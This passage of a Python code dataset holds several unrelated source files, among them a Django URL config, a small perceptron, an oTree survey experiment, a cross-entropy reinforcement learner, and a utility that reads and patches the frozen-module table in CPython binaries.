result.append(self.helper(lower, upper))\n return result\n \n # Edge case 1) Missing ranges at the beginning, it is in lower-1\n pre_point = lower -1\n for point in nums:\n if pre_point != point and pre_point+1 != point:\n result.append(self.helper(pre_point+1, point-1))\n pre_point = point\n \n # Edge case 2) Missing ranges at the end\n if nums[-1] < upper:\n result.append(self.helper(nums[-1] + 1, upper))\n \n return result\n '''\n\n def findMissingRanges(self, nums, lower, upper):\n # write your code here\n result = []\n ln = len(nums)\n # Edge case 1) Missing ranges at the beginning, it is in lower-1\n pre = lower -1\n for i in range(ln+1):\n # Edge case 2) Missing ranges at the end\n curr = upper+1 if i==ln else nums[i]\n if curr - pre > 1:\n result.append(self.helper(pre+1, curr-1))\n pre = curr\n \n return result\n\n \n def helper(self, left_point, right_point):\n if left_point == right_point:\n return str(left_point)\n else:\n return str(left_point) + \"->\" + str(right_point) \n \n\n \n\n","sub_path":"Python/163.missing-ranges.py","file_name":"163.missing-ranges.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"622046624","text":"\"\"\"pharmrep URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.contrib.auth import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),\n url(r'product/', include('product.urls')),\n url(r'activity/', include('activity.urls')),\n url(r'reports/', include('reports.urls')),\n url(r'forum/', include('forum.urls')),\n]\n\nurlpatterns += [\n url(r'accounts/login/$',\n views.login,\n {'template_name': 'core/login.html'},\n name='login'),\n url(r'accounts/logout/$',\n views.logout,\n {'next_page': '/accounts/login/'},\n name='logout'),\n]\n\nadmin.site.site_header = 'Pharmacy Reps admin'\n","sub_path":"pharmrep/pharmrep/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"41291563","text":"from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nimport numpy as np\n\nimport pickle\n\nclass Net:\n def __init__(self, input_count=6, neuron_count=6):\n self.input_count = input_count\n self.neuron_count = neuron_count\n\n self.weights = np.zeros((neuron_count, input_count))\n self.D = None # inputs\n self.Y = None # answers\n \n self.σ = lambda x: 1 if x > 0.9 else 0\n self.α = 0.02\n self.β = 0.0\n\n self.etalons, self.predictions = [], []\n\n\n def funk(self, x, i):\n s = self.β + np.sum(x @ self.weights[i])\n return self.σ(s)\n \n def train(self, i):\n _w = self.weights[i].copy()\n for x, y in zip(self.D, self.Y[i]):\n self.weights[i] += self.α * (y - self.funk(x, i)) * x\n return (self.weights[i] != _w).any()\n\n def net(self, vec, other=False):\n s = [0 for i in range(np.shape(self.weights)[0])]\n for i in range(len(s)):\n s[i] = self.funk(vec, i)\n if s[i] == 1:\n other = True\n break\n if not other:\n s[0] = 1\n return(s)\n\n def load(self, WEIGHTS_FILE='weights.dat'):\n with open(WEIGHTS_FILE, 'rb') as f:\n self.weights = pickle.load(f)\n\n def save(self, WEIGHTS_FILE='weights.dat'):\n with open(WEIGHTS_FILE, \"wb\") as f:\n pickle.dump(self.weights, f)\n\n def load_data(self, DATA_FILE='data.dat'):\n with open(DATA_FILE, 'rb') as f:\n out = pickle.load(f)\n self.D, self.Y = out[0], out[1]\n\n def save_data(self, DATA_FILE='data.dat'):\n with open(DATA_FILE, \"wb\") as f:\n pickle.dump([self.D, self.Y], f)\n\n def add_stats(self, etalon, prediction):\n self.etalons.append(etalon)\n self.predictions.append(prediction)\n\n def clear_stats(self, etalon, prediction):\n self.etalons = []\n self.predictions = []\n\n def show_stats(self):\n print('Accuracy: {}'.format(accuracy_score(self.etalons, self.predictions)))\n print('Precision score: {}'.format(precision_score(self.etalons, self.predictions, average='weighted')))\n print('Recall score: {}'.format(recall_score(self.etalons, self.predictions, average='weighted')))\n print('F1 score: {}'.format(f1_score(self.etalons, self.predictions, average='weighted')))\n \n","sub_path":"apps/predicate/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"308833718","text":"import cv2\nimport site\nimg = cv2.imread('./cross_section_of_communication_pipe.png', cv2.IMREAD_COLOR)\ng, b, r = cv2.split(img)\ngbr_img = cv2.merge((g, b, r))\nrbr_img = cv2.merge((r, b, r))\n# cv2.imshow('Original', img)\n# # cv2.imshow('GRB', gbr_img)\n# cv2.imshow('RBR', rbr_img)\n# cv2.waitKey(3000)\n\nprint(site.getsitepackages())","sub_path":"DataScience/AnacondaProjects/opencv_channels_merge.py","file_name":"opencv_channels_merge.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452984637","text":"__all__ = (\"FrozenTable\",)\r\nfrom .BinPatchTools import *\nimport typing\r\nfrom _io import _IOBase\r\nimport typing\r\nimport struct\r\nfrom pathlib import Path\r\nimport warnings\r\nimport marshal\r\nimport mmap\r\nfrom collections import OrderedDict\r\n\r\nfrom .cpython_frozen_table import *\r\n\r\nfrozenTablePtrImportName = \"PyImport_FrozenModules\"\r\nfrozenTableImportName = \"_\" + frozenTablePtrImportName\r\n\r\n\r\n# from hexdump import hexdump\r\n\r\n\r\nDictT = OrderedDict\r\n\r\n\r\ndef searchBytesWithinRange(haystack:bytes, needle:bytes, start:int, stop:int) -> typing.List[int]:\r\n\tres = []\r\n\tfound = start\r\n\twhile True:\r\n\t\tfound = haystack.find(needle, found, stop)\r\n\t\tif found == -1:\r\n\t\t\tbreak\r\n\r\n\t\tif found:\r\n\t\t\tres.append(found)\r\n\r\n\t\tfound += 1 # next pos\r\n\treturn res\r\n\r\n\r\nclass FrozenTable:\r\n\tdef __init__(self, source: typing.Union[mmap.mmap, Path], unmarshal: bool = False, searchWindowSize: int = 500, intSize:int = 4, paddingSize:int = None) -> None:\r\n\t\t\"\"\"\r\n\t\t`source` is the source of a PE file.\r\n\t\t`unmarshal` controls if the tool should unmarshal objects for further analysis.\r\n\t\t`searchWindowSize` controls the neighbourhood to look for pointers to determine padding and pointer sizes\r\n\t\t\"\"\"\r\n\t\tctor = getFormatCtor(source)\r\n\t\tself.format = ctor(source)\r\n\r\n\t\tif unmarshal:\r\n\t\t\twarnings.warn(\"Uses `marshal` currently -> code execution!\")\r\n\r\n\t\tself.unmarshal = unmarshal\r\n\t\tself.dict = None\r\n\t\tself.intSize = intSize\r\n\t\tself.paddingSize = paddingSize\r\n\t\tself.searchWindowSize = searchWindowSize\r\n\r\n\tdef __enter__(self) -> \"FrozenTable\":\r\n\t\tself.format.__enter__()\r\n\t\tself.parse()\r\n\t\treturn self\r\n\r\n\tdef __exit__(self, *args, **kwargs) -> None:\r\n\t\tself.format.__exit__(*args, **kwargs)\r\n\t\tself.table = None\r\n\t\tself.dict = None\r\n\t\tself.tableOffset = None\r\n\r\n\tdef findHeuristically(self, searchStrStartOffset:int = 0, searchStrEndOffset:int = -1, searchPtrStartOffset:int = 0, searchPtrEndOffset:int = -1, limit:int = 0, namesBank: typing.Tuple[bytes, bytes, bytes, bytes, bytes, bytes] = (b\"__hello__\", b\"__phello__\", b\"_frozen_importlib\", b\"_frozen_importlib_external\", b\"zipimport\", b\"__phello__.spam\") ) -> typing.Tuple[int, int]:\r\n\t\t\"\"\"Tries to heuristically find the table. In order to do it searches the binary for already known strings used as names for sections, then searches for pointers to them in the file. In an ELF file pointers can be rewritten by linker and there are lot of formulas to do it and each reloc, and formulas involve pointers addresses, so I currently know any good way to make it work with ELF correctly. But for some files this works, becaise they have raw virtual addresses in the pointers needed by us.\"\"\"\r\n\t\tfrom math import gcd\r\n\t\tf = self.format.map\r\n\t\taddrs = []\r\n\r\n\t\tfor name in namesBank:\r\n\t\t\tfor nameOfs in searchBytesWithinRange(f, name, searchStrStartOffset, searchStrEndOffset):\r\n\t\t\t\tnamePtr = self.format.offset2Raw(nameOfs)\r\n\t\t\t\t#TODO: bruteforce different relocation modes. Fortunately names are not usually relocated in ELF\r\n\r\n\t\t\t\tif namePtr:\r\n\t\t\t\t\tnamePtrBytes = self.format.ptrPacker.pack(namePtr)\r\n\t\t\t\t\tinitialPtrs = searchBytesWithinRange(f, namePtrBytes, searchPtrStartOffset, searchPtrEndOffset)\r\n\t\t\t\t\tif limit and len(initialPtrs) > limit:\r\n\t\t\t\t\t\tinitialPtrs = initialPtrs[:limit]\r\n\t\t\t\t\taddrs.extend(initialPtrs)\r\n\r\n\t\t#print(addrs)\r\n\t\tminAddr = min(addrs)\r\n\t\t#print(\"minAddr\", hex(minAddr))\r\n\t\tentrySize = 0\r\n\t\tfor addr in addrs:\r\n\t\t\tentrySize = gcd(entrySize, addr - minAddr)\r\n\t\t#print(\"entrySize\", entrySize)\r\n\r\n\t\treturn minAddr, entrySize\r\n\r\n\tdef parse(self) -> None:\r\n\t\t\"\"\"Parses the table. `source` is either `mmap` or `Path`.\"\"\"\r\n\t\ttableRaw = None\r\n\t\tentrySize = None\r\n\r\n\t\ttry:\r\n\t\t\ttableRaw = self.format.findVA(frozenTableImportName)\r\n\t\t\t#print(\"Found from import immediately\", hex(tableRaw))\r\n\t\texcept BaseException:\r\n\t\t\tpass\r\n\r\n\t\tif not tableRaw:\r\n\t\t\ttry:\r\n\t\t\t\tfrozenPtrVA = self.format.findVA(frozenTablePtrImportName)\r\n\t\t\t\tfrozenPtrOffset = self.format.raw2Offset(frozenPtrVA)\r\n\r\n\t\t\t\t#print(\"frozenPtrVA: \", hex(frozenPtrVA))\r\n\t\t\t\t#print(\"frozenPtrOffset: \", hex(frozenPtrOffset))\r\n\r\n\t\t\t\ttableRaw = self.format.parsePtr(frozenPtrOffset)\r\n\t\t\t\t#print(\"Found from import by ptr\", hex(tableRaw))\r\n\r\n\t\t\texcept BaseException:\r\n\t\t\t\tpass\r\n\r\n\t\tif not tableRaw:\r\n\t\t\ttry:\r\n\t\t\t\ttableRaw, entrySize = self.findHeuristically()\r\n\t\t\t\t#print(\"Found heuristically\", hex(tableRaw))\r\n\t\t\texcept BaseException:\r\n\t\t\t\tpass\r\n\r\n\t\tif not tableRaw:\r\n\t\t\traise NotImplementedError(\"Table has not been found\")\r\n\r\n\t\tself.tableOffset = self.format.raw2Offset(tableRaw)\r\n\r\n\t\tkaitStr = KaitaiStream(BytesIO(self.format.map))\r\n\r\n\t\tif self.paddingSize is None:\r\n\t\t\tif entrySize is None:\r\n\t\t\t\t#firstName = self.format.raw2Offset(self.format.parsePtr(self.tableOffset)) # first item of the record is name\r\n\t\t\t\tfirstName = self.format.resolvePtrByOffset(self.tableOffset) # first item of the record is name\r\n\t\t\t\t#print(self.format.map[firstName:firstName+20])\r\n\t\t\t\tentrySize = self.findHeuristically(searchPtrStartOffset=self.tableOffset - self.searchWindowSize, searchPtrEndOffset=self.tableOffset + self.searchWindowSize, limit=0)[1]\r\n\r\n\t\t\tintAndPaddingSize = entrySize - 2 * self.format.byteness\r\n\t\t\tself.paddingSize = intAndPaddingSize - self.intSize\r\n\r\n\t\tassert self.paddingSize == 4 or self.paddingSize == 0\r\n\r\n\t\t#print(\"sizeof(int)\", self.intSize)\r\n\t\t#print(\"padding size\", self.paddingSize)\r\n\r\n\t\tparsed = CpythonFrozenTable(self.format.byteness, self.intSize, self.paddingSize, self.tableOffset, kaitStr)\r\n\r\n\t\tfor i in range(len(parsed.table) - 1):\r\n\t\t\tentry = parsed.table[i]\r\n\t\t\t#print(\"entry.code_size_and_type\", hex(entry.code_size_and_type), entry.code_size_and_type)\r\n\t\t\tresEl = CpythonFrozenTable.TranslatedEntry(\r\n\t\t\t\tcode_offset=self.format.raw2Offset(self.format.resolvePtr(\r\n\t\t\t\t\tentry.code_ptr.raw_ptr,\r\n\t\t\t\t\tself.format.offset2Raw(entry.code_ptr._debug[\"raw_ptr\"][\"start\"])\r\n\t\t\t\t)),\r\n\t\t\t\tentry=entry,\r\n\t\t\t\tname_offset=self.format.raw2Offset(self.format.resolvePtr(\r\n\t\t\t\t\tentry.name_ptr.raw_ptr,\r\n\t\t\t\t\tself.format.offset2Raw(entry.name_ptr._debug[\"raw_ptr\"][\"start\"])\r\n\t\t\t\t)),\r\n\t\t\t\t_io=parsed._io, _parent=parsed, _root=parsed._root\r\n\t\t\t)\r\n\t\t\tif self.unmarshal:\r\n\t\t\t\tresEl.obj = marshal.loads(resEl.code)\r\n\r\n\t\t\tparsed.table[i] = resEl\r\n\r\n\t\tself.table = parsed.table\r\n\r\n\t\tself.dict = DictT((el.name, el) for el in iter(self))\r\n\r\n\tdef __iter__(self) -> typing.Iterator[CpythonFrozenTable.TranslatedEntry]:\r\n\t\tfor el in self.table:\r\n\t\t\tif isinstance(el, CpythonFrozenTable.TranslatedEntry):\r\n\t\t\t\tyield el\r\n\r\n\tdef keys(self):\r\n\t\treturn self.dict.keys()\r\n\r\n\tdef values(self):\r\n\t\treturn self.dict.values()\r\n\r\n\tdef items(self):\r\n\t\treturn self.dict.values()\r\n\r\n\tdef getIntTypeLetter(self) -> str:\r\n\t\tif self.intSize == 4:\r\n\t\t\treturn \"i\"\r\n\t\telif self.intSize == 8:\r\n\t\t\treturn \"q\"\r\n\t\telif self.intSize == 2:\r\n\t\t\treturn \"d\"\r\n\t\telse:\r\n\t\t\traise ValueError(\"Unsupported byteness \" + str(self.intSize))\r\n\r\n\tdef writeTable(self) -> None:\r\n\t\t\"\"\"Constructs and writes the table of pointers from self.dict\"\"\"\r\n\r\n\t\toffset = self.tableOffset\r\n\t\t#print(\"tableOffset\", hex(self.tableOffset))\r\n\r\n\t\ts = struct.Struct(self.format.getPtrTypeLetter() * 2 + self.getIntTypeLetter())\r\n\r\n\t\tdef writeItem(name_ptr:int, code_ptr:int, code_size:int, is_package:bool=False):\r\n\t\t\tnonlocal offset\r\n\t\t\tif is_package:\r\n\t\t\t\tcode_size *= -1\r\n\r\n\t\t\tdata = s.pack(name_ptr, code_ptr, code_size) + b\"\\0\"*self.paddingSize\r\n\t\t\tnewOffset = offset + len(data)\r\n\t\t\t#print(hexdump(self.format.map[offset:newOffset], \"return\"), \"->\", hexdump(data, \"return\"))\r\n\r\n\t\t\tself.format.map[offset:newOffset] = data\r\n\t\t\toffset = newOffset\r\n\r\n\t\tfor entry in self.items():\r\n\t\t\twriteItem(entry.entry.name_ptr.raw_ptr, entry.entry.code_ptr.raw_ptr, entry.entry.code_size, entry.entry.is_package)\r\n\r\n\t\twriteItem(0, 0, 0, False)\r\n\r\n\tdef modifyEntry(self, name:str, code:typing.Union[bytes, bytearray], newName:str = None) -> None:\r\n\t\t\"\"\"Modifies the actual data and marshalled objects in place. There must be enough space (the newer code/name should consume less or equal amount of space) for them. First modifies the data, second modifies the items. You need to `writeTable` after that!!!\"\"\"\r\n\r\n\t\tif newName and len(newName) > len(name):\r\n\t\t\traise ValueError(\"Not enough space for new name\")\r\n\r\n\t\tel = self[name]\r\n\r\n\t\tif len(code) > el.entry.code_size:\r\n\t\t\traise ValueError(\"Not enough space for new code\")\r\n\r\n\t\tif code is not None:\r\n\t\t\tel._m_code = code\r\n\t\t\tel.entry._m_code_size = len(code)\r\n\t\t\tself.format.map[el.code_offset : (el.code_offset + len(code))] = code\r\n\r\n\t\tif newName is not None:\r\n\t\t\tnewNameL = len(newName)\r\n\t\t\tendNameOffst = el.name_offset + newNameL\r\n\t\t\tzerosLen = len(name) - newNameL + 1\r\n\r\n\t\t\tself.format.map[el.name_offset : endNameOffst] = newName.encode(\"ascii\")\r\n\t\t\tself.format.map[endNameOffst : endNameOffst + zerosLen] = b\"\\0\" * zerosLen\r\n\r\n\t\t\tel._m_name = newName\r\n\t\t\tself.dict[newName] = el\r\n\t\t\tdel (self.dict[name])\r\n\r\n\tdef __getitem__(self, k:str) -> CpythonFrozenTable.TranslatedEntry:\r\n\t\treturn self.dict[k]\r\n\r\n\tdef __contains__(self, k:str) -> bool:\r\n\t\treturn k in self.dict\r\n\r\n\tdef __delitem__(self, k:str) -> None:\r\n\t\tdel (self.dict[k])\r\n\r\n\tdef reorder(self, order:typing.Iterable[str]) -> None:\r\n\t\t\"\"\"Reorders entries in the table. Doesn't change locations of code and names.\"\"\"\r\n\t\tnewItems = []\r\n\t\tfor elName in order:\r\n\t\t\tnewItems.append((elName, self[elName]))\r\n\t\tself.dict = DictT(newItems)\r\n\r\n\tdef remove(self, toRemove:typing.Iterable[str]) -> None:\r\n\t\t\"\"\"Removes entries from the table. Doesn't removes the actual code and names\"\"\"\r\n\t\tfor elName in toRemove:\r\n\t\t\tif elName in self:\r\n\t\t\t\tdel (self[elName])\r\n","sub_path":"FrozenTable/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"512467245","text":"from otree.api import (\n models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n Currency as c, currency_range\n)\nimport numpy.random\n\n\nauthor = 'Mohin Banker'\n\ndoc = \"\"\"\nThis is an oTree implementation of a lab experiment investigating financial impacts of information avoidance.\n\"\"\"\n\n\nclass Constants(BaseConstants):\n rounds_per_supergame = 3\n num_supergames = 1\n treatments = [\"none\", \"optional\", \"mandatory\"]\n\n tokens_per_supergame = 30.0\n num_rounds = num_supergames * rounds_per_supergame\n name_in_url = 'information_avoidance'\n players_per_group = None\n\n probsA = [1.0/21 + 0.004*(10-i) for i in range(0, 21)]\n probsB = [1.0/21 for i in range(0, 21)]\n probsC = [1.0/21 + 0.004*(i-10)for i in range(0, 21)]\n\n multipliers = list(range(0,21))\n\n values = [\"A\", \"B\", \"C\"]\n\nclass Subsession(BaseSubsession):\n initial_round = models.BooleanField(doc = \"True iff current round is the first round of a supergame\")\n subgames = models.IntegerField(doc = \"The number of rounds per supergame shown to the player\")\n show_round = models.BooleanField(doc = \"True iff participant is shown the round of the game. Otherwise, the round is skipped for fewer subgames.\")\n tokens_per_subgame = models.IntegerField(doc = \"Number of tokens endowed at each subgame\")\n\n def before_session_starts(self):\n self.initial_round = ((self.round_number - 1) % Constants.rounds_per_supergame) == 0\n self.subgames = int(self.session.config[\"rounds_in_supergame\"])\n self.show_round = ((self.round_number-1) % Constants.rounds_per_supergame) < self.subgames\n self.tokens_per_subgame = round(Constants.tokens_per_supergame/self.subgames)\n\n # Equally distribute treatments among players\n for i in range(len(self.get_players())):\n p = self.get_players()[i]\n p.treatment = Constants.treatments[i % len(Constants.treatments)]\n\n # Takes in gamble choice and return multiplier\n def sim_gamble(self, choice):\n multiplier = 0\n if (choice == \"A\"):\n multiplier = numpy.random.choice(Constants.multipliers, 1, p = Constants.probsA)\n elif (choice == \"B\"):\n multiplier = numpy.random.choice(Constants.multipliers, 1, p = Constants.probsB)\n elif (choice == \"C\"):\n multiplier = numpy.random.choice(Constants.multipliers, 1, p = Constants.probsC)\n\n multiplier = multiplier.item()\n return(multiplier/10.0)\n\n\n\n\nclass Group(BaseGroup):\n pass\n\n\nclass Player(BasePlayer):\n treatment = models.CharField(doc = \"The treatment assigned to the player\")\n information_shown = models.BooleanField(\n initial = None,\n blank = True,\n choices = [[True, \"Yes\"], [False, \"No\"]],\n widget = widgets.RadioSelect(),\n doc = \"True iff the player opted in to see information\")\n\n investment = models.IntegerField(doc = \"How many tokens the player chose to invest\")\n not_invested = models.IntegerField(doc = \"Number of tokens not invested\")\n investment_return = models.IntegerField(doc = \"Net profit from player's investment\")\n earned = models.IntegerField(doc = \"The payoff of the investment (gross)\")\n revenue = models.IntegerField(doc = \"Sum of earned tokens and non-invested tokens\")\n previous_payoff = models.IntegerField(doc = \"Total tokens earned before the current round\")\n multiplier = models.FloatField(doc = \"Multiplier used for investment outcome\")\n chosen_option = models.CharField(\n initial = None,\n choices = Constants.values,\n blank = False,\n widget = widgets.RadioSelect(),\n doc = \"The lottery game chosen by the player in this round\")\n \n previous_option = models.CharField(\n initial = None,\n choices = Constants.values,\n blank = False,\n widget = widgets.RadioSelect(),\n doc = \"The lottery game chosen by the player in the previous round\")\n \n info_option = models.CharField(initial = None, doc = \"Gamble that player chose to view information for\")\n info_investment = models.IntegerField(initial = None, doc = \"Amount invested in information scenario\")\n info_not_invested = models.IntegerField(doc = \"Number of tokens not invested\")\n info_investment_return = models.IntegerField(initial = None, doc = \"Net profit from information investment\")\n info_earned = models.IntegerField(initial = None, doc = \"Sum of investment and investment return\")\n info_earned_total = models.IntegerField(initial = None, doc = \"Total tokens earned in this round\")\n info_multiplier = models.FloatField(doc = \"Multiplier used for investment in information scenario\")\n info_total_invested = models.IntegerField(doc = \"Sum of investments across gambles in simulated information\")\n info_revenue = models.IntegerField(doc = \"Sum of earned tokens and non-invested tokens\")\n\n infoavoidance1 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"As part of a semi-annual medical checkup, your doctor asks you a series of questions. The answers to these questions can be used to estimate your life expectancy (the age you are predicted to live to). Do you want to know how long you can expect to live?\",\n widget = widgets.RadioSelect())\n infoavoidance2 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You provide some genetic material to a testing service to learn more about your ancestors. You are then told that the same test can, at no additional cost, tell you whether you have an elevated risk of developing Alzheimer's. Do you want to know whether you have a high risk of developing Alzheimer's?\",\n widget = widgets.RadioSelect())\n infoavoidance3 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"At your annual checkup, you are given the option to see the results of a diagnostic test which can identify, among other things, the extent to which your body has suffered long-term effects from stress. Do you want to know how much lasting damage your body has suffered from stress?\",\n widget = widgets.RadioSelect())\n infoavoidance4 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"Ten years ago, you had the opportunity to invest in two retirement funds: Fund A and Fund B. For the past 10 years, you have invested all your retirement savings in Fund A. Do you want to know the balance you would have, if you had invested in Fund B instead?\",\n widget = widgets.RadioSelect())\n infoavoidance5 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You decide to go to the theater for your birthday and give your close friend (or partner) your credit card so they can purchase tickets for the two of you, which they do. You aren't sure, but suspect that the tickets may have been expensive. Do you want to know how much the tickets cost?\",\n widget = widgets.RadioSelect())\n infoavoidance6 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You bought an electronic appliance at a store at what seemed like a reasonable, though not particularly low, price. A month has passed, and the item is no longer returnable. You see the same appliance displayed in another store with a sign announcing 'SALE.' Do you want to know the price you could have bought it for?\",\n widget = widgets.RadioSelect())\n infoavoidance7 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You gave a close friend one of your favorite books for her birthday. Visiting her apartment a couple of months later, you notice the book on her shelf. She never said anything about it; do you want to know if she liked the book?\",\n widget = widgets.RadioSelect())\n infoavoidance8 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"Someone has described you as quirky, which could be interpreted in a positive or negative sense. Do you want to know which interpretation he intended?\",\n widget = widgets.RadioSelect())\n infoavoidance9 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You gave a toast at your best friend’s wedding. Your best friend says you did a good job, but you aren’t sure if he or she meant it. Later, you overhear people discussing the toasts. Do you want to know what people really thought of your toast?\",\n widget = widgets.RadioSelect())\n infoavoidance10 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"As part of a fund-raising event, you agree to post a picture of yourself and have people guess your age (the closer they get, the more they win). At the end of the event, you have the option to see people's guesses. Do you want to learn how old people guessed that you are?\",\n widget = widgets.RadioSelect())\n infoavoidance11 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"You have just participated in a psychological study in which all the participants rate one-anothers' attractiveness. The experimenter gives you an option to see the results for how people rated you. Do you want to know how attractive other people think you are?\",\n widget = widgets.RadioSelect())\n infoavoidance12 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[1,\"Definitely don't want to know\"], [2, \"Probably don't want to know\"], [3, \"Probably want to know\"], [4, \"Definitely want to know\"]],\n verbose_name = \"Some people seek out information even when it might be painful. Others avoid getting information that they suspect might be painful, even if it could be useful. How would you describe yourself?\",\n widget = widgets.RadioSelect())\n infoavoidance13 = models.PositiveIntegerField(\n initial = None,\n blank = True,\n choices = [[4,\"Strongly disagree\"], [3, \"Somewhat disagree\"], [2, \"Somewhat agree\"], [4, \"Strongly agree\"]],\n verbose_name = \"If people know bad things about my life that I don't know, I would prefer not to be told.\",\n widget = widgets.RadioSelect())\n\n riskpreferences1 = models.PositiveIntegerField(\n initial = None,\n blank = True)\n\n econ_exp = models.BooleanField(initial = None, blank = True)\n marketing_exp = models.BooleanField(initial = None, blank = True)\n law_exp = models.BooleanField(initial = None, blank = True)\n\n is_male = models.BooleanField(\n initial = None, \n blank = True,\n verbose_name = \"What is your gender?\",\n choices = [[True, \"Male\"], [False, \"Female\"]])\n english = models.CharField(\n initial = None, \n blank = True,\n verbose_name = \"Is English your primary language\",\n choices = [\"Yes\", \"No\", \"Prefer not to answer\"],\n widget = widgets.RadioSelect())\n age = models.PositiveIntegerField(\n initial = None, \n blank = True,\n verbose_name = \"How old are you?\",\n widget = widgets.SliderInput(attrs={'step':1}, show_value = False),\n min = 18,\n max = 100)","sub_path":"information_avoidance/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469918008","text":"import gym\nfrom gym import wrappers, logger\nimport numpy as np\nimport pickle\nimport json, sys, os\nfrom os import path\n\nimport argparse\n'''\nsolve continuous binary decision problem\n'''\nclass CELearning:\n def __init__(self, env, elite_frac=0.2, batch_size=25, max_iter=10):\n self.env = env\n self.elite_frac = elite_frac\n self.batch_size = batch_size\n self.max_iter = max_iter\n state_dim = env.observation_space.shape[0]\n self.theta = np.zeros(state_dim + 1) # plus bias\n\n def select_action(self, state, theta):\n w = theta[:-1]\n b = theta[-1]\n y = state.dot(w) + b\n a = int(y < 0)\n return a # 0 or 1\n\n def get_reward(self, theta, num_steps=200):\n total_reward = 0\n state = self.env.reset()\n for t in range(num_steps):\n action = self.select_action(state, theta)\n state, reward, done, _ = self.env.step(action)\n total_reward += reward\n if done:\n break\n return total_reward\n\n def train(self):\n n_elite = int(self.batch_size * self.elite_frac)\n theta_std = np.ones(self.theta.shape)\n theta_size = self.theta.size\n for i in range(self.max_iter):\n theta_list = np.array([self.theta + dth for dth in theta_std[None,:] * \\\n np.random.randn(self.batch_size, theta_size)])\n reward_list = np.array([self.get_reward(theta) for theta in theta_list])\n elite_indexes = reward_list.argsort()[::-1][:n_elite]\n elite_theta_list = theta_list[elite_indexes]\n self.theta = elite_theta_list.mean(axis=0)\n theta_std = elite_theta_list.std(axis=0)\n\n def predict(self, state):\n # given the current state, select the best action\n return self.select_action(state, self.theta)\n\n\n","sub_path":"pa4/policy_learning.py","file_name":"policy_learning.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"419681139","text":"import matplotlib.pyplot as plt \n\nfrom random_walk import RandomWalk \n\n\n# Make a random walk\nrw = RandomWalk(500)\nrw.fill_walk()\n\n# Plot the points in the walk\n\nplt.style.use('classic')\nfig, ax = plt.subplots()\npoint_numbers = range(rw.num_points)\nax.plot(rw.x_values, rw.y_values, linewidth=0.5) \n\n# Remove the axes\nax.get_xaxis().set_visible(False) 